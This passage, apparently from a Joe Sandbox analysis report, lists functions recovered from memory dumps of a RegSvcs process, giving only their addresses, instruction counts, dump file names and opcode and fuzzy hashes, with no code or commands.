                                                                                                                          Function 06D9AB69 Relevance: .2, Instructions: 237COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4b71738ca37cf8f39806dd65a419452cafdedcc1fdc8add8218fb07402f45ec0
                                                                                                                          • Instruction ID: df7c55aa488d5dfa0e1f4d8711363cd84a499d4672ce221b08a8aaa44c53f16d
                                                                                                                          • Opcode Fuzzy Hash: 4b71738ca37cf8f39806dd65a419452cafdedcc1fdc8add8218fb07402f45ec0
                                                                                                                          • Instruction Fuzzy Hash: BF916C747102018FCB85DF79D898A5D7BF2AF89314B2584A9E406CB7B6EB31EC05CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C308 Relevance: .2, Instructions: 224COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ebc975bf25f87b905595dc5c591a9f97bcc9527f92c5566ebd516aa977f3e7a3
                                                                                                                          • Instruction ID: 3f254d47c0b3af03293418188d57a8d87f4ce37caabdc86ace90f73ec165afab
                                                                                                                          • Opcode Fuzzy Hash: ebc975bf25f87b905595dc5c591a9f97bcc9527f92c5566ebd516aa977f3e7a3
                                                                                                                          • Instruction Fuzzy Hash: F3715E30B102158BDF54ABB8D46977E76E3AFC9354F248429E406DB394EF78DC028BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9AC10 Relevance: .2, Instructions: 212COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2e313b1f5a52199f00ed70532f4e9e3e9378c085f4d91646a8944c21fc96cef1
                                                                                                                          • Instruction ID: 3415a4de49eaadef013746087d7f54b127891d246139a5ab5301b65004cc7277
                                                                                                                          • Opcode Fuzzy Hash: 2e313b1f5a52199f00ed70532f4e9e3e9378c085f4d91646a8944c21fc96cef1
                                                                                                                          • Instruction Fuzzy Hash: 15814A357101058FCB84EF69D89899DB7F2FF89214B258469E406DB765EF31EC058BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D96540 Relevance: .2, Instructions: 201COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dc468b3cb1a982678b684c265a2e56d0b7ad55f9777afbcf72ff8357dcc64088
                                                                                                                          • Instruction ID: bd062b3d53399ac9af4da50522d7310adac6f9f8adea4213d802d11452f93136
                                                                                                                          • Opcode Fuzzy Hash: dc468b3cb1a982678b684c265a2e56d0b7ad55f9777afbcf72ff8357dcc64088
                                                                                                                          • Instruction Fuzzy Hash: EB712A34B106858FEF95DF28C888ABA7BE5EF49744B1900A9E901CB375DB75DC41CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D964E0 Relevance: .1, Instructions: 142COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 640c22ade34596be63136382361f03941e4bbaae4e11f734e9d5528f019d1a8e
                                                                                                                          • Instruction ID: 50bfaec0bb6e37be5089d1cbb1088ec640fab61913b3cc79b3878e9c6dde5b3f
                                                                                                                          • Opcode Fuzzy Hash: 640c22ade34596be63136382361f03941e4bbaae4e11f734e9d5528f019d1a8e
                                                                                                                          • Instruction Fuzzy Hash: 18514C30B142818FDB55DF38D858A7A7BF5AF49654B1A40A9E505CF3B2EB34EC01CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C5F4 Relevance: .1, Instructions: 128COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a1c97ec4590ee2f7689885b0b5848f23f791fb66e7ce429019b6368366bb0e0a
                                                                                                                          • Instruction ID: e55c630860ebecb5c300806240ece32f1ac2abb4114e2a6890500804441fa7f2
                                                                                                                          • Opcode Fuzzy Hash: a1c97ec4590ee2f7689885b0b5848f23f791fb66e7ce429019b6368366bb0e0a
                                                                                                                          • Instruction Fuzzy Hash: 2A413235B202118FDF54ABB4D82977E76E6AF88655F244428E806DB384EF78DC41CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D969B3 Relevance: .1, Instructions: 120COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9de5f5eb6bb7d351abda7b2d1aa7dbbed1a8b9475a1157b41e5db7ad70d5f943
                                                                                                                          • Instruction ID: d3e01fab121c6ca778139851e4421016c923a14d0f5bdef7e0642f2b5a4fe633
                                                                                                                          • Opcode Fuzzy Hash: 9de5f5eb6bb7d351abda7b2d1aa7dbbed1a8b9475a1157b41e5db7ad70d5f943
                                                                                                                          • Instruction Fuzzy Hash: B141BE31A00299DFEF15CFA4C844A9EBFB2FF49354F058156E845AF2A1E331E954CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C068 Relevance: .1, Instructions: 87COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 09f7d6f4a0c45451ef25124a6fef14ec1824e7af5d811c00aed0ef005465efe6
                                                                                                                          • Instruction ID: 72ce9a5133369191d6cf1fadd9e656f774528c0342df9d4b74d4e1b641b636b3
                                                                                                                          • Opcode Fuzzy Hash: 09f7d6f4a0c45451ef25124a6fef14ec1824e7af5d811c00aed0ef005465efe6
                                                                                                                          • Instruction Fuzzy Hash: D821F670B142058FCB85EBB8D85599E37F2BF89200B448466D11AEB355EB348C06CB65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C189 Relevance: .1, Instructions: 85COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f7e3f81181044fa0c198e7230732fd1e6ecc0c11d44b623001f58752fade3ac8
                                                                                                                          • Instruction ID: 62fb776dbcb8ba290e242ced82cf9dd3e93d45c4cd2d292fdf2b49425d203dd8
                                                                                                                          • Opcode Fuzzy Hash: f7e3f81181044fa0c198e7230732fd1e6ecc0c11d44b623001f58752fade3ac8
                                                                                                                          • Instruction Fuzzy Hash: 00210530B143458FCB81EBB8D8549AD7BF1BF8A200B458466D149EB3A5EB34DD068B65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0150D4D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5aa91bde15375149c3fe43250f7c8fcde4ccdde84ef43e1244b65fe18ce4a06f
                                                                                                                          • Instruction ID: faded3107051997634c8a8caa9d189f78d062b56f303924207f681caf78bac91
                                                                                                                          • Opcode Fuzzy Hash: 5aa91bde15375149c3fe43250f7c8fcde4ccdde84ef43e1244b65fe18ce4a06f
                                                                                                                          • Instruction Fuzzy Hash: 5221D671504240DFDB06DFD4D9C0B2ABBB5FB88328F248569ED054F686C337D856CAA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0150D3EC Relevance: .1, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f08264360908f5b25a4c2a2c4514aab0c2fc7139bd73df9bb97e28630c7873c0
                                                                                                                          • Instruction ID: 5f8bfcc065d37ac04837bdf58f140f467adc55306ac7287629623e4b6fa28b4a
                                                                                                                          • Opcode Fuzzy Hash: f08264360908f5b25a4c2a2c4514aab0c2fc7139bd73df9bb97e28630c7873c0
                                                                                                                          • Instruction Fuzzy Hash: 0C213671504200EFDB02DFD4C9C0B6ABBB5FB84324F24C568E8090F687C376E806C6A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 015FE3DC Relevance: .1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.527066289.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_15fd000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 228854d3c91b6a16344dfabdc8f17ea79e81f48d84baf96785477601a75dfe2c
                                                                                                                          • Instruction ID: a4eb137c17b4fb7eb731e2e7a8b40175fe5fd066784d15ad0ed7c343a8f7241c
                                                                                                                          • Opcode Fuzzy Hash: 228854d3c91b6a16344dfabdc8f17ea79e81f48d84baf96785477601a75dfe2c
                                                                                                                          • Instruction Fuzzy Hash: E9213771504240DFDB01DF14D8C9B1ABBA5FB88324F24C96DDA094F7A6C336D846CAA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9E7C4 Relevance: .1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 801d9170b8222b3578728c74c6d4edcab1d945077b9eccf7944714fe81241639
                                                                                                                          • Instruction ID: 9c3abd88cd118dbfcf016d1b9f68b10302a2188cbd10393cabd0a972dddff944
                                                                                                                          • Opcode Fuzzy Hash: 801d9170b8222b3578728c74c6d4edcab1d945077b9eccf7944714fe81241639
                                                                                                                          • Instruction Fuzzy Hash: AE216270E04245DFDBA9DBA5D8587AE7BF3AFC5244F15C05CD0069B291CB788846CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9EB01 Relevance: .1, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 92a254443c42df2388cfd2b4ac737b583fcf3b29d9f867a9a1d7db795f605122
                                                                                                                          • Instruction ID: 3e4626577237bf3167df9550349208b3ed6f2f3851330ee62ec5151bd11360ef
                                                                                                                          • Opcode Fuzzy Hash: 92a254443c42df2388cfd2b4ac737b583fcf3b29d9f867a9a1d7db795f605122
                                                                                                                          • Instruction Fuzzy Hash: 25215770E002499FDF55CFA5D594AEEBFB6FF48209F248029E442AA360DB349A45DF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D96A98 Relevance: .1, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bf4702c97d9e020b7d1d9cb2d942c0357155d411f59d7656e2a40f68f89bbd4a
                                                                                                                          • Instruction ID: 8b5f0b46c447646aa48653b9d64fd9bbcfea9d5949c90cb6b41bc74adb95cbe5
                                                                                                                          • Opcode Fuzzy Hash: bf4702c97d9e020b7d1d9cb2d942c0357155d411f59d7656e2a40f68f89bbd4a
                                                                                                                          • Instruction Fuzzy Hash: 0211B631A002899FEF50CF68C884B9EBBF2EF85368F058255E5185B2A1E371F850C7B4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0150D4D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
                                                                                                                          • Instruction ID: 07f3ba1d062a429727ff8be2b8465bc7a4a4cfe1cea80fa2056bd9888e9f41dd
                                                                                                                          • Opcode Fuzzy Hash: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
                                                                                                                          • Instruction Fuzzy Hash: 1311AF76404280DFDB12CF94D9C4B1ABF71FB84324F2486A9DC090B657C33AD456CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0150D3E7 Relevance: .1, Instructions: 56COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.526483925.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_150d000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
                                                                                                                          • Instruction ID: 2934515f35bcad67f4404bde063835733d70dc69c086e1e83512be40901a10a1
                                                                                                                          • Opcode Fuzzy Hash: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
                                                                                                                          • Instruction Fuzzy Hash: 6A11B476404244DFDB02CF94D9C4B5ABF71FB84320F24C5A9D8080B657C37AD456CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C0C8 Relevance: .1, Instructions: 52COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1b0f8de3fc8303856387745808fdb9664c05458cee81808cc2c24ef8a4b8db13
                                                                                                                          • Instruction ID: a1ce4718f4b9b8519e04f460024ba75258c3718f2487cfa4772ad1e26b8634b7
                                                                                                                          • Opcode Fuzzy Hash: 1b0f8de3fc8303856387745808fdb9664c05458cee81808cc2c24ef8a4b8db13
                                                                                                                          • Instruction Fuzzy Hash: CF113C30B102199F8F80FBB9D8949AE77F1FB892547508829E51AE7350EB349D018BA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C1E8 Relevance: .1, Instructions: 52COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3806484cc51dbfd3e8bcb168cdc3c29cebbca98c99e794cdb16153a924bf3ec6
                                                                                                                          • Instruction ID: e6e04d7660c826bed9a9fe37a26cc852a6ba779dfe7f52ebde191062192635be
                                                                                                                          • Opcode Fuzzy Hash: 3806484cc51dbfd3e8bcb168cdc3c29cebbca98c99e794cdb16153a924bf3ec6
                                                                                                                          • Instruction Fuzzy Hash: A6115E30F002199F8F80FBB9D8949AE77F1FFC82147508429D50AE7350EB349D068BA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9685A Relevance: .0, Instructions: 40COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e3d847681ffd258cafe36bb4dfbd90151ddaf7221e22cbd18f4e4d9bb9231d6f
                                                                                                                          • Instruction ID: 2ae4ecc1602e93818d97ca5ffa947d5bf63976b4f7af4103ece8ad7fe5bb5f99
                                                                                                                          • Opcode Fuzzy Hash: e3d847681ffd258cafe36bb4dfbd90151ddaf7221e22cbd18f4e4d9bb9231d6f
                                                                                                                          • Instruction Fuzzy Hash: BF010479E002589FDF48CFD8D9048DDBBB5FF88310F00812AE915AB354D7359919CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C247 Relevance: .0, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2d15a07ceaa9951f60c5f7ca57691e50b5997902086d6333114c7b7ed60c2eda
                                                                                                                          • Instruction ID: d4fc02db713ac6d15a0e9a838d10342aaaba1976278785e00a68589fc7ed92aa
                                                                                                                          • Opcode Fuzzy Hash: 2d15a07ceaa9951f60c5f7ca57691e50b5997902086d6333114c7b7ed60c2eda
                                                                                                                          • Instruction Fuzzy Hash: 36E06D35B001188B8F80FBB9D8948AC73F1AFC82257508065E506E7390DE349C0597A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9C127 Relevance: .0, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7fbe0f5adaa11a59adef42f32c8557b3fd36b162dc471964955f5e2a1c8e1f68
                                                                                                                          • Instruction ID: 02d2957603f20b0b9583db2c3558148ab62e5a8bdd85a0c006c689a4ae1b11d6
                                                                                                                          • Opcode Fuzzy Hash: 7fbe0f5adaa11a59adef42f32c8557b3fd36b162dc471964955f5e2a1c8e1f68
                                                                                                                          • Instruction Fuzzy Hash: 5FE06D31B101188B8FC0FBB9DC948AC73F1BF882557508465E517E7390DE249C0187A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 06D9A6C4 Relevance: .0, Instructions: 18COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.552329357.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_6d90000_RegSvcs.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f0df72073e1cb3f3e41c887daa18241a5e92d41669f91ee5dc3c0b22aefe85c8
                                                                                                                          • Instruction ID: 75908fc17c6c9adccf34f71b61024f26a4e09392f97c1a1e125f1591f96b31f6
                                                                                                                          • Opcode Fuzzy Hash: f0df72073e1cb3f3e41c887daa18241a5e92d41669f91ee5dc3c0b22aefe85c8
                                                                                                                          • Instruction Fuzzy Hash: C4D02202B202168B9FA402BF156027E30C30B800CBB28083A4422CE2C0FF2CC98462F2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%